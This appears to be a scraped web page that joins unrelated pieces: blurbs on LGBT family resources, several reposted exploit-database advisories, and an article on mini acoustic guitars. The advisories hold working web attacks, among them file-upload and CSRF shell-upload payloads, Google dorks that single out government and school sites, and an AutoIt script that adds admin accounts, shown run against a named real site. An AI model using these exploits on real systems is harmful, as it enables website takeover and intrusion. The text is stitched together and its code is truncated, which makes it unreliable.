    Although, at times, it may feel as though you have lost someone close to you, you haven't. It is your perception of them that has changed. Your loved one is the same person he or she was before you heard the news; the only difference now is that they now have a different image in your eyes. That loss can be very difficult, but that image can, happily, be replaced with a new and clearer understanding of your loved one.

    An excellent resource for friends and family.

    COLAGE (Children of Lesbians and Gays everywhere) is the only national and international organization in the world specifically supporting young people with gay, lesbian, bisexual, and transgender parents. Their mission is to "foster the growth of daughters and sons of lesbian, gay, bisexual and transgender parents of all racial, ethnic, and class backgrounds by providing education, support and community on local and international levels, to advocate for our rights and those of our families, and to promote acceptance and awareness that love makes a family."

    QueerAmerica is a database published by OutProud, The National Coalition for Gay, Lesbian, Bisexual and Transgender Youth It is the largest collection of lesbian and gay resources in the nation, and includes information on community centers, support organizations, queer youth groups, and more. These can be great places to meet friends, get questions answered, or find support.

    This site was created by the Partners Task Force for Gay & Lesbian Couples. It is a national resource for same-sex couples, supporting the diverse community of committed gay and lesbian partners through a variety of media, including more than 200 essays, surveys, legal articles and resources on legal marriage, ceremonies, domestic partner benefits, relationship tips, parenting, and immigration.


              Joomla ( com_invest ) LFI vuln   

    0     _                   __           __       __                     1
    1   /' \            __  /'__`\        /\ \__  /'__`\                   0
    0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
    1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
    0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
    1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
    0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
    1                  \ \____/ >> Exploit database separated by exploit   0
    0                   \/___/          type (local, remote, DoS, etc.)    1
    1                                                                      1
    0  [+] Site            : 1337day.com                                   0
    1  [+] Support e-mail  : submit[at]1337day.com                         1
    0                                                                      0
    1               #########################################              1
    0               I'm Caddy-dz member from Inj3ct0r Team                 1
    1               #########################################              0

    # Exploit Title: Joomla Component com_invest LFI Vulnerability
    # Author: Caddy-Dz
    # Facebook Page: http://www.facebook.com/ALG.Cyber.Army
    # E-mail: islam_babia@hotmail.com
    # Category:: webapps
    # Plugin: http://software.skuzet.nl/component/option,com_phocadownload/Itemid,3/id,7/view,category/
    # Google Dork: [inurl:index.php?option=com_invest controller=]
    # Security Risk: medium
    # Tested on: Windows Seven Edition Integral / French

    # Sp Greetz To 1337day Team

    [*] Vulnerable Code :

    // get controller
    if ($controller = JRequest::getVar('view')) {
            $path = JPATH_COMPONENT.DS.'controllers'.DS.$controller.'.php';
            if (file_exists($path)) {
            } else {
                    JError::raiseError(JText::_('unknown controller'));
    [*] Exploit :

              Arbitrary File Upload Vulnerability (com_remository)   

    Joomla Component -> com_remository -> Arbitrary File Upload Vulnerability
    << Joomla Component -> com_remository -> Arbitrary File Upload Vulnerability

    << Author : Z190T

    << Contact : mahruz[dot]id[at]gmail[dot]com

    << Homepage : http://mahruz-id.com/

    << Vendor : http://remository.com/downloads/

    << d0rk :

    - inurl:"func=addfile" <– Organisation, School, Academic and Government of Indonesian Site

    - inurl:"/func,addfile/" <– Organisation, School, Academic and Government of Indonesian Site

    - inurl:"index.php?option=com_remository" <– free!!

    << File Allowed : Any File Extension

    << Try 0n : any OS

    << readme.

    Sebelumnya,, saya hanya ingin memberi tau satu hal penting about pentingnya berhati2 memilih plugin atau componen web baik itu pada Joomla, WordPress, Drupal atau yang lainnya. ndak penting preview website yang kita bangun itu bagus, preview bagus ndak menjamin keamanan suatu website, yang terpenting adalah bagaimana website yang kita miliki terlihat simple dengan dukungan sistem keamanan di atas rata-rata.

    Saya akan memberi tahu satu dari sekian banyak kelemahan component pada Joomla, yaitu Repository. Repository yang dimaksud di sini adalah acuan bahan atau file download yang disediakan secara terbuka untuk user, admin dan bahkan untuk semua pengunjung.

    Remository adalah nama perubahan untuk Repository yang ada pada Joomla, entahlah,,, saya juga ndak mengerti, kenapa harus pkek nama Remository??

    bodo amat!!.

    udah ah,, kelamaan baca tulisan saya yang salbut!! langsung saja…

    << Untuk d0rk [inurl:"func=addfile"] dan [inurl:"index.php?option=com_remository"]

    Contoh :


    “You have no permitted upload categories – please refer to the webmaster”

    Disana kita bisa melihat, kita tidak mempunyai izin untuk upload data dengan identitas 15 pada bagian 46, hanya Admin yang di perbolehkan untuk upload data ke area tersebut, lantas,,, bagaimana caranya supaya kita bisa upload data ke area tersebut? Ooo,,,, tidak bissaa…!! ß hanya orang bodoh yang mengatakan hal itu!. kita manipulasikan data yang akan kita masukkan!!, Let’s do it!!

    Pada bagian ItemId ndak usah dirubah, yang kita rubah hanya id nya saja. inject-inject dikit supaya table uploadnya keluar!! ^_^






    dan seterusnya.. sampai keluar croot-nya!! heheheheee….

    Kalo bosen nginject, langsung patokin saja di angka tertinggi,, misalnya,,


    tpi,, klo misalnya kita dapat di..


    langsung dah upload!!, jangan lupa,, isi formnya,, supaya mudah mencari directory hasil uploadnya.

    All Done!

    Please Note: All Uploads will be reviewed prior to Publishing.

    Yes!! kita berhasil!!

    Pada bagian pencarian hasil upload ini yang menurut saya agak sulit soalnya file yang udah kita upload udah melalui converter pada bagian ../remositoryAdminDbonvert.php

    isinya seperti ini..


    class remositoryAdminDbconvert extends remositoryAdminControllers {

        function remositoryAdminDbconvert ($admin) {
            remositoryAdminControllers::remositoryAdminControllers ($admin);
            $_REQUEST['act'] = 'dbconvert';
        function listTask () {
            $view =& new remositoryAdminHTML ($this, 0, '');
            $interface =& remositoryInterface::getInstance();
            $database =& $interface->getDB();
            foreach (array('containers','files','reviews','structure','log','temp') as $tablename) {
                $sql = "TRUNCATE TABLE #__downloads_$tablename";
            $sql = "ALTER TABLE #__downloads_containers AUTO_INCREMENT=2";
            $containermap = array('catid'=>array(),'folderid'=>array());
            $sql = "SELECT * FROM #__downloads_category";
            $rows = $database->loadObjectList();
            if (!$rows) $rows = array();
            foreach ($rows as $row) {
                if ($row->registered) $row->registered = '0';
                else $row->registered = '2';
                foreach ($row as $field=>$value) {
                    if (!is_numeric($row->$field)) $row->$field = $database->getEscaped($row->$field);
                $sql = "INSERT INTO #__downloads_containers (parentid,name,published,description,filecount,icon,registered) VALUES (0,'$row->name',$row->published,'$row->description',$row->files,'$row->icon',$row->registered)";
                if (!$database->query()) {
                    echo "<script> alert('".$database->getErrorMsg()."'); window.history.go(-1); </script>\n";
                $newid = $database->insertid();
                $containermap['catid'][$row->id] = $newid;
                $sql = "SELECT * FROM #__downloads_folders WHERE catid=$row->id";
                $folders = $database->loadObjectList();
                if ($folders) {
                    foreach ($folders as $folder) $this->convertfolder ($folder, $newid, $containermap);
            $sql = "SELECT * FROM #__downloads";
            $files = $database->loadObjectList();
            if (!$files) $files = array();
            foreach ($files as $file) {
                $testurl = strtolower(trim($file->url));
                $findsite = strpos($testurl, strtolower(trim($interface->getCfg('live_site'))));
                if ($findsite===false){
                    $islocal = '0';
                    $realname = '';
                    $filedate = date('Y-m-d');
                    $url = $file->url;
                    if (eregi(_REMOSITORY_REGEXP_URL,$url) OR eregi(_REMOSITORY_REGEXP_IP,$url)) $filefound = true;
                    else $filefound = false;
                else {
                    $islocal = '1';
                    $url = '';
                    $realname = $url_array[(count($url_array)-1)];
                    $filepath = $this->repository->Down_Path.'/'.$realname;
                    if (file_exists($filepath)) {
                        $filefound = true;
                        $filedate = date('Y-m-d', filemtime($this->repository->Down_Path.'/'.$realname));
                    else $filefound = false;
                $containerid = 0;
                if ($file->catid != 0) {
                    if (isset($containermap['catid'][$file->catid])) $containerid = $containermap['catid'][$file->catid];
                    else echo '<tr><td>'.$file->id.'/'.$realname.'/'.$file->catid.'</td></tr>';
                if ($file->folderid != 0) {
                    if (isset($containermap['folderid'][$file->folderid])) $containerid = $containermap['folderid'][$file->folderid];
                    else echo '<tr><td>'.$file->id.'/'.$realname.'/'.$file->folderid.'</td></tr>';
                if ($filefound AND $containerid != 0) {
                    foreach (get_class_vars(get_class($file)) as $field=>$value) if (is_string($file->$field)) $file->$field = $database->getEscaped($file->$field);
                    $sql="INSERT INTO #__downloads_files (realname,islocal,containerid,published,url,description,smalldesc,autoshort,license,licenseagree,filetitle,filesize,filetype,downloads,icon,fileversion,fileauthor,filedate,filehomepage,screenurl,submittedby,submitdate) VALUES ('$realname',$islocal,$containerid,$file->published,'$url','$file->description','$file->smalldesc',$file->autoshort,'$file->license',$file->licenseagree,'$file->filename','$file->filesize','$file->filetype','$file->downloads','$file->icon','$file->fileversion','$file->fileauthor','$filedate','$file->filehomepage','$file->screenurl', $file->submittedby,'$file->submitdate')";
                    if (!$database->query()) {
                        echo "<script> alert('".$database->getErrorMsg()."'); window.history.go(-1); </script>\n";
                    $newid = $database->insertid();
                    $sql = "SELECT * FROM #__downloads_comments WHERE id=$file->id";
                    $comments = $database->loadObjectList();
                    if ($comments) {
                        foreach ($comments as $comment) {
                            $sql = "INSERT INTO #__downloads_reviews (component,itemid,userid,title,comment,date) VALUES ('com_remository',$newid,'$comment->userid','Review Title','$comment->comment','$comment->time')";
                else echo '<tr><td>'.$file->url.'</td></tr>';
            echo '<tr><td class="message">'._DOWN_DB_CONVERT_OK.'</td></tr>';
            echo '</table></form>';
        function convertfolder ($folder, $parent, &$containermap) {
            $interface =& remositoryInterface::getInstance();
            $database =& $interface->getDB();
            foreach ($folder as $field=>$value) {
                if (!is_numeric($folder->$field)) $folder->$field = $database->getEscaped($folder->$field);
            if ($folder->registered) $folder->registered = '0';
            else $folder->registered = '2';
            $sql = "INSERT INTO #__downloads_containers (parentid,name,published,description,filecount,icon,registered) VALUES ($parent, '$folder->name', $folder->published, '$folder->description', '$folder->files', '$folder->icon', $folder->registered)";
            if (!$database->query()) {
                echo "<script> alert('".$database->getErrorMsg()."'); window.history.go(-1); </script>\n";
            $newid = $database->insertid();
            $containermap['folderid'][$folder->id] = $newid;
            $sql = "SELECT * FROM #__downloads_folders WHERE parentid=$folder->id";
            $children = $database->loadObjectList();
            if ($children) {
                foreach ($children as $child) convertfolder ($child, $newid, $containermap);


    Silahkan kamu deskripsikan sendiri!! ^_^ heheheee….

    << Untuk d0rk [inurl:"/func,addfile/"]

    Contoh :


    cara inject-nya ndak jauh beda,, hanya menambahkan /id/(angka). misalnya..


              KindEditor (Upload File)   

    0     _                   __           __       __                     1
    1   /' \            __  /'__`\        /\ \__  /'__`\                   0
    0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
    1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
    0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
    1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
    0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
    1                  \ \____/ >> Exploit database separated by exploit   0
    0                   \/___/          type (local, remote, DoS, etc.)    1
    1                                                                      1
    0  [+] Site            : 1337day.com                                   0
    1  [+] Support e-mail  : submit[at]1337day.com                         1
    0                                                                      0
    1               #########################################              1
    0               I'm KedAns-Dz member from Inj3ct0r Team                1
    1               #########################################              0

    # Title : KindEditor (v.3.x->4.1.5) <= File/Shell Upload Vulnerability
    # Author : KedAns-Dz
    # E-mail : ked-h (@hotmail.com / @1337day.com)
    # Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)
    # Web Site : www.1337day.com
    # FaCeb0ok : http://fb.me/Inj3ct0rK3d
    # TwiTter : @kedans
    # Friendly Sites : www.r00tw0rm.com * www.exploit-id.com
    # Platform/CatID : php - remote - Multiple
    # Type : php - proof of concept - webapp 0day
    # Tested on : Windows7
    # Download : [http://code.google.com/p/kindeditor/downloads/detail?name=kindeditor-4.1.5.zip]
    # Vendor : [http://www.kindsoft.net/]

    # <3 <3 Greetings t0 Palestine <3 <3
    # F-ck HaCking, Lov3 Explo8ting !

    ######## [ Proof / Exploit ] ################|=>

    # Description :
    - This bug in ( KindEditor ) you can upload remote files ( .txt .html ...etc )
    with multiple JSON upload langs type ( PHP / ASP / JSP / ASP.NET )
    this bug found in old versions by some author , but is still work is latest version .

    - Latest V. is ( 4.1.5 ) , Released on ( Jan 19, 2013 )

    - old poc : (http://www.devilscafe.in/2012/01/kindedior-remote-file-upload-exploit.html)

    # Google Dork :
     allinurl:/php/upload_json.php / .asp / .jsp

    # KindEditor PHP_JSON Uploader


    $ch = curl_init("http://[Target]/[path]/kindeditor/php/upload_json.php?dir=file");
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS,
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $postResult = curl_exec($ch);
    print "$postResult";


    # KindEditor (ASP,ASP.NET,JSP,PHP) _JSON Uploader :

    - Change the Uploader by ( LANG / PATH ) and use this HTML Uploader


    <title>Uploader By KedAns-Dz</title>
    <script src="http://[Target]/kindeditor/kindeditor-min.js"></script>
    KindEditor.ready(function(K) {
    var uploadbutton = K.uploadbutton({
    button : K('#uploadButton')[0],
    fieldName : 'imgFile',
    url : 'http://[Target]/kindeditor/php/upload_json.asp?dir=file',
    afterUpload : function(data) {
    if (data.error === 0) {
    var url = K.formatUrl(data.url, 'absolute');
    uploadbutton.fileBox.change(function(e) {
    <div class="upload">
    <input class="ke-input-text" type="text" id="url" value="" readonly="readonly" />
    <input type="button" id="uploadButton" value="Upload" />

              Wordpress Plugin Sexy Add Template   

     0          _                   __           __       __                         1
     1        /' \            __  /'__`\        /\ \__  /'__`\                       0
     0       /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___               1
     1       \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\              0
     0          \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/               1
     1           \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\               0
     0            \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/               1
     1                       \ \____/ >> Exploit database separated by exploit       0
     0                        \/___/          type (local, remote, DoS, etc.)        1
     1                                                                               0
     0       [x] Official Website: http://www.1337day.com                            1
     1       [x] Support E-mail  : mr.inj3ct0r[at]gmail[dot]com                      0
     0                                                                               1
     1                  $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$                   0
     0                  I'm NuxbieCyber Member From Inj3ct0r TEAM                    1
     1                  $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$                   0

     |||   Wordpress Plugin Sexy Add Template - CSRF Upload Shell Vulnerability    |||

     ./Title Exploit : Wordpress Plugin Sexy Add Template - CSRF Upload Shell Vulnerability
     ./Link Download : http://wordpress.org/extend/plugins/sexy-add-template/
     ./Author Exploit: [ TheCyberNuxbie ] [ root@31337sec.com ] [ nux_exploit ]
     ./Security Risk : [ Critical Level ]
     ./Category XPL  : [ WebApps/ZeroDay ]
     ./Tested On     : Mozilla Firefox + Xampp + Windows 7 Ultimate x32 ID
     ./Time & Date   : September, 22 2012. 10:27 AM. Jakarta, Indonesia.

     |||                        -=[ Use It At Your Risk ]=-                        |||
     |||               This Was Written For Educational Purpos Only                |||
     |||               Author Will Be Not Responsible For Any Damage               |||

     # [ Information Details ]
     # - Wordpress Plugin Sexy Add Template:
     # Attacker allow CSRF Upload Shell.
     # http://localhost/wp-admin/themes.php?page=AM-sexy-handle <--- Vuln CSRF, not require verification CODE "wpnonce".
     # <html>
     # <head>
     # <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
     # <title>Wordpress Plugin Sexy Add Template - CSRF Upload Shell Vulnerability</title>
     # </head>
     # <body onload="document.form0.submit();">
     # <form method="POST" name="form0" action="http://localhost/wp-admin/themes.php?page=AM-sexy-handle" method="post" enctype="multipart/form-data" >
     # <input type="hidden" name="newfile" value="yes" />
     # <input type="hidden" type="text" value="shell.php" name="AM_filename">
     # <textarea type="hidden" name="AM_file_content">
     # [ Your Script Backdoor/Shell ]
     # </textarea>
     # </form>
     # </body>
     # </html>
     # - Access Shell:
     # http://localhost/wp-content/themes/[theme-name]/shell.php

              Joomla (webotima shell upload vuln)   

    0     _                   __           __       __                     1
    1   /' \            __  /'__`\        /\ \__  /'__`\                   0
    0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
    1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
    0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
    1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
    0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
    1                  \ \____/ >> Exploit database separated by exploit   0
    0                   \/___/          type (local, remote, DoS, etc.)    1
    1                                                                      1
    0  [+] Site            : 1337day.com                                   0
    1  [+] Support e-mail  : submit[at]1337day.com                         1
    0                                                                      0
    1               #########################################              1
    0               I'm AkaStep member from Inj3ct0r Team                  1
    1               #########################################              0

    Video: http://www.youtube.com/watch?v=2Cm9hNR3dNc&feature=youtu.be
    Vulnerable Software: Weboptima CMS
    Vendor: http://weboptima.am/
    Both Exploits are available(HTML exploit to upload shell)
    And Autoit Exploit to add arbitrary admin accounts to target site.
    More detailts below.

    Few DEMOS:

    About Vulns:

    1'ST vulnerability is REMOTE SHELL UPLOAD:
    Vulnerable code:

    =============SNIP BEGINS======================
    mkdir($path, 0777);

    $letter = $_GET['letter'];
    $selTypey = $_GET['selType'];
    header("Location: upload.php?letter=$letter&selType=$selTypey");
    <?php include_once("start.php"); ?>
        <div align="center">
        <table align="center">
            <td colspan="3" align="center"><span class="title">ФїЦЃХѕХЎХ® Ц†ХЎХµХ¬ХҐЦЂ</span></td>
    $fileName = $_FILES["up_file"]['name'];
    $masSimbl = array('&','%','#');
    if(in_array($fileName[0], $masSimbl))
    echo $fileName[0].' ХЅХ«ХґХѕХёХ¬ХёХѕ ХЅХЇХЅХѕХёХІ ХЎХ¶ХёЦ‚Х¶ Х№ХЁХ¶ХїЦЂХҐХ¬';
    ========================SNIP ENDS=================

    Simple HTML exploit to upload your shell:

    <form method="post" action="http://CHANGE_TO_TARGET/cms/upload.php" enctype="multipart/form-data">
    <input type="file"   name="up_file" />&nbsp;&nbsp;<input type="submit" class="button" name="sub" value="send"></form>

    After Successfully shell upload your shell can be found: http://site.tld/uploades/shellname.php

    NOTE: There may be simple .htaccess to prevent you from accessing shell(HTTP 403).
    This is not problem just upload your shell like:



    2'nd vulnerability is: REMOTE ADD ADMIN
    Vulnerable Code:
    Notice: header() without exit;*Script continues it's execution.*
    ==================SNIP BEGINS=========
    if($_SESSION['status_shoping_adm']!="adm_shop") {
    header("Location: index.php");

    $_POST = stripSlash($_POST);
    $_GET = stripSlash($_GET);
    $error = "";
    //And more stuff
    ==================SNIP ENDS=============

    And here is exploit written in Autoit to exploit
    this vulnerability and add admin to target site.

    Exploit usage(CLI):

    weboptima.exe http://decart.am AzerbaijanBlackHatzWasHere AzerbaijanBlackHatzWasHere

    Weboptima CMS(weboptima.am) REMOTE ADD ADMIN EXPLOIT(priv8)
    Usage: weboptima.exe http://site.tld  username  password
    [*]      DON'T HATE THE HACKER, HATE YOUR OWN CODE!      [*]
    [@@@]           Vuln & Exploit By AkaStep               [@@@]
    [*] GOT Response : Yes! It is exactly that we are looking for! [*]

    Trying to add new admin:
    To Site:www.decart.am
    With Username: AzerbaijanBlackHatzWasHere
    With Password: AzerbaijanBlackHatzWasHere

    Exploit Try Count:1
    Error Count:0

    Exploit Try Count:2
    Error Count:0
    Count of errors during exploitation : 0

    [*] Yaaaaa We are Going To Travel xD           [*]
    Try to login @
    Site: decart.am/cms/index.php
    With Username: AzerbaijanBlackHatzWasHere
    With Password: AzerbaijanBlackHatzWasHere
    *NOTE* Make Sure Your Browser Reveals HTTP REFERER!
    [*] Exit [*]

    #Region ;**** Directives created by AutoIt3Wrapper_GUI ****
    #EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
    #include "WinHttp.au3"
    #include <inet.au3>
    #include <String.au3>

    $exploitname=@CRLF & _StringRepeat('#',62) & @CRLF & _
    'Weboptima CMS(weboptima.am) REMOTE ADD ADMIN EXPLOIT(priv8) ' & @CRLF  & _
    'Usage: ' & @ScriptName &  ' http://site.tld ' & ' username  ' & 'password ' & _
    @CRLF & "[*]      DON'T HATE THE HACKER, HATE YOUR OWN CODE!      [*]" & @CRLF & _
    '[@@@]           Vuln & Exploit By AkaStep               [@@@]' & @CRLF & _StringRepeat('#',62);
    ConsoleWrite(@CRLF & $exploitname & @CRLF)

    $vulnurl='cms/loginPass.php?test=' & Random(1,15677415,1);
    Global $count=0,$error=0;
    $cmsindent='kcaptcha'; # We will use it to identify CMS #;

    ;#~  Impersonate that We Are Not BOT or exploit.We are human who uses IE. Dohhh))# ~;
    $useragent='Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SV1; .NET CLR 1.1.4325)';
    $msg_usage="Command Line Plizzzz => " & @CRLF & "Usage: " & @ScriptName &  ' http://site.tld ' & ' usernametoadd ' & 'passwordtoadd' & @CRLF
    if  $CmdLine[0] <> 3 Then
    ConsoleWrite(@CRLF & _StringRepeat('#',62) & @CRLF & $msg_usage & @CRLF & _StringRepeat('#',62) & @CRLF);

    if $CmdLine[0]=3 Then

    if StringStripWS($targetsite,8)='' OR StringStripWS($username,8)='' OR StringStripWS($password,8)='' Then
    ConsoleWrite('Are you kidding me?');

    if @error Then
    ConsoleWrite('[*] Are you sure that site exist? Theris an error! Please Try again! [*]' & @CRLF)

    ConsoleWrite('[+] GETTING INFO ABOUT CMS [+] ' & @CRLF);

    $sidentify=_INetGetSource($targetsite & $adminpanel,True);

    if StringInStr($sidentify,$cmsindent) Then
    ConsoleWrite("[*] GOT Response : Yes! It is exactly that we are looking for! [*]" & @CRLF)
    ConsoleWrite("[*] IDENTIFICATION RESULT IS WRONG!. Anyway,forcing to try exploit it. [*]" & @CRLF)

    $targetsite='www.' & StringReplace(StringReplace($targetsite,'http://',''),'/','')

    priv8($targetsite,$username,$password,$count,$error);#~ do the magic for me plizzz));~#

    Func priv8($targetsite,$username,$password,$count,$error)

    $count+=1;~ #~ We are not going to exploit in infinitive manner xD #~;

    Global $sAddress = $targetsite

    $triptrop=@CRLF & _StringRepeat('#',50) & @CRLF;
    $whatcurrentlywedo=$triptrop & 'Trying to add new admin: ' & @CRLF &  'To Site:' & $targetsite & @CRLF & 'With Username: ' & _
    $username & @CRLF & 'With Password: ' & $password &  $triptrop;
    if $count <=1 then ConsoleWrite($whatcurrentlywedo)

    $doitnicely=$triptrop & 'Exploit Try Count:' & $count & $triptrop & 'Error Count:' & $error & $triptrop;
    Global $sPostData = "login=" & $username & "&password=" & $password & "&status=1" & "&add_sub=Add+New";

    if $error>=2 OR $count>=2 Then
    ConsoleWrite('Count of errors during exploitation : ' & $error & @CRLF)

    if int($error)=0 then
    ConsoleWrite($triptrop & '[*] Yaaaaa We are Going To Travel xD           [*]' & _
    @CRLF & 'Try to login @ '  & @CRLF  & _
    'Site: ' & $targetsite & $adminpanel & @CRLF &'With Username: '  & _
    $username & @CRLF & 'With Password: ' & $password & @CRLF & _
    '*NOTE* Make Sure Your Browser Reveals HTTP REFERER!' & @CRLF & _
    '   OTHERWISE YOU WILL UNABLE TO LOGIN!   ' & $triptrop & '[*] Exit [*]' & $triptrop);

    ConsoleWrite($triptrop & '[*] Seems Is not exploitable or Vuln Fixed?   [*]' & @CRLF & _
    '[*] Anyway,try to login with new credentials. [*]' & @CRLF & _
    '[*]  May be you are Lucky;)                   [*]' & _
    @CRLF & 'Try to login @ '  & @CRLF  & _
    'Site: ' & $targetsite & $adminpanel & @CRLF & _
    'With Username: '  & $username & @CRLF & 'With Password: ' & $password &  $triptrop & '[*] Exit [*]' & $triptrop);



    Global $hOpen = _WinHttpOpen($useragent);
    Global $hConnect = _WinHttpConnect($hOpen, $sAddress)
    Global $hRequest = _WinHttpOpenRequest($hConnect,$method,$vulnurl,Default,Default,'');
    _WinHttpAddRequestHeaders($hRequest, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8")
    _WinHttpAddRequestHeaders($hRequest, "Accept-Language: en-US,en;q=0.5")
    _WinHttpAddRequestHeaders($hRequest, "Accept-Encoding: gzip, deflate")
    _WinHttpAddRequestHeaders($hRequest, "DNT: 1")
    _WinHttpAddRequestHeaders($hRequest, "Referer: " & $targetsite & $vulnurl);# We need it #;
    _WinHttpAddRequestHeaders($hRequest, "Cookie: ComeToPwnYou");#~ Not neccessary just for compatibility.Change or "rm" it if you want. #~;
    _WinHttpAddRequestHeaders($hRequest, "Connection: keep-alive")
    _WinHttpAddRequestHeaders($hRequest, "Content-Type: application/x-www-form-urlencoded")
    _WinHttpAddRequestHeaders($hRequest, "Content-Length: " & StringLen($sPostData));
    _WinHttpSendRequest($hRequest, -1, $sPostData)

    Global $sHeader, $sReturned
    If _WinHttpQueryDataAvailable($hRequest) Then
        $sHeader = _WinHttpQueryHeaders($hRequest)
            $sReturned &= _WinHttpReadData($hRequest)
        Until @error


    priv8($targetsite,$username,$password,$count,$error);#~ Pass to function and TRY to Exploit #~;



    priv8($targetsite,$username,$password,$count,$error);#~double check anyway.;~#


    EndFunc;=> priv8();


              Uploader Arbitrary File Upload Vulnerability   

    0     _                   __           __       __                     1
    1   /' \            __  /'__`\        /\ \__  /'__`\                   0
    0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
    1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
    0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
    1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
    0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
    1                  \ \____/ >> Exploit database separated by exploit   0
    0                   \/___/          type (local, remote, DoS, etc.)    1
    1                                                                      1
    0  [+] Site            : 1337day.com                                   0
    1  [+] Support e-mail  : submit[at]1337day.com                         1
    0                                                                      0
    1               #########################################              1
    0               I'm Sammy FORGIT member from Inj3ct0r Team             1
    1               #########################################              0
    # Description : Wordpress Plugins - Uploader Arbitrary File Upload Vulnerability
    # Version : 1.0.4
    # Link : http://wordpress.org/extend/plugins/uploader/
    # Plugins : http://downloads.wordpress.org/plugin/uploader.1.0.4.zip
    # Date : 28-12-2012
    # Google Dork : inurl:/wp-content/plugins/uploader/
    # Site : 1337day.com Inj3ct0r Exploit Database
    # Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr

    Exploit :


    $ch = curl_init("http://localhost/wordpress/wp-content/plugins/uploader/uploadify/uploadify.php");
    curl_setopt($ch, CURLOPT_POST, true);  
    curl_setopt($ch, CURLOPT_POSTFIELDS,
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $postResult = curl_exec($ch);
    print "$postResult";


    Shell Access :


    # Site : 1337day.com Inj3ct0r Exploit Database

              Mini Acoustic Guitars   
    Ever since the origins of the modern guitar in the 18th century, the instrument has been available in various sizes. Antonio d Torres gave the modern classical guitar its form as we know it today. The modern classical guitar has a scale of 648 to 650 mm, which is roughly 26 inches. Full size electric guitars have a slightly shorter scale. Most Fender instruments are 25 1/2” while Gibson has maintained the 24 1/2” scale.

    Sizes of Classical Guitars

    Classic guitar builders have offered guitars that are 1/4 sized, 1/2 sized, 3/4 sized, and full size for players of different ages and differing physiques.

    1830 Stauffer Terz

    In the 1930’s C.F. Martin introduced the Terz guitar. It was based on the size of the Terz or Treble classical guitar. Joseph Stauffer, from whom C.F. Martin senior learned his craft, had built Terz guitars. So it would stand to reason Martin would continue the tradition.

    Martin 5-18 Terz Guitar

    The Martin Terz was a 3/4 scale guitar and offered in different styles. The 5-18 was probably the most popular. Marty Robbins used his on stage. This guitar was designed to be tuned three frets above standard pitch.

    1937 Gibson L-00

    In 1932 Gibson introduce the L-00 Flat top guitar. This was a small bodied instrument, and one of the nicer versions of the L series. By 1937, Gibson offered this model in a 3/4 sized option.

    1950 Gibson LG-2 3/4 size

    In 1933 Gibson had also introduced the very fancy LC model in a 3/4 sized version. In 1942 Gibson offered the LG-2 and by 1949 it was available in a 3/4 size version. This is the guitar that Arlo Guthrie favors.

    Arlo Guthrie LG-2 

    In 2002 Gibson decided to reintroduce this very model when Arlo Guthrie contacted Gibson’s craftsmen to ask for help In reconstructing a guitar that his father Woody had given him as a present. After painstakingly rebuilding the instrument, Gibson decided to offer the same guitar to the public as the Arlo Guthrie LG-2 3/4. This list price was $2079, but they are available for much less.

    Back in 1945, following the World War II, Harmony guitars of Chicago was back in business and reintroduced The Stella guitar. Stella had been a brand offered as far back as 1899 by the Oscar Schmidt Company. When the company went bankrupt in the 1930’s, Harmony guitars stepped in a acquired their assets.

    Harmony "Stella"  H929

    The 3/4 sized Stella H929 was in the line up from 1945 through 1970 and was popular as a student model. The guitar was made mainly from birch and used all solid woods. It was ladder braced. Despite being 3/4 sized, it still had a 24 1/2” scale.

    Bob Taylor working on a guitar
    Bob Taylor was working for a small guitar manufacturing business in 1972 when he was only 18 years old. Within two years, Bob, and co-workers Kurt Listig, and Steve Schemmer bought the company. They needed a band name to put on the guitars.

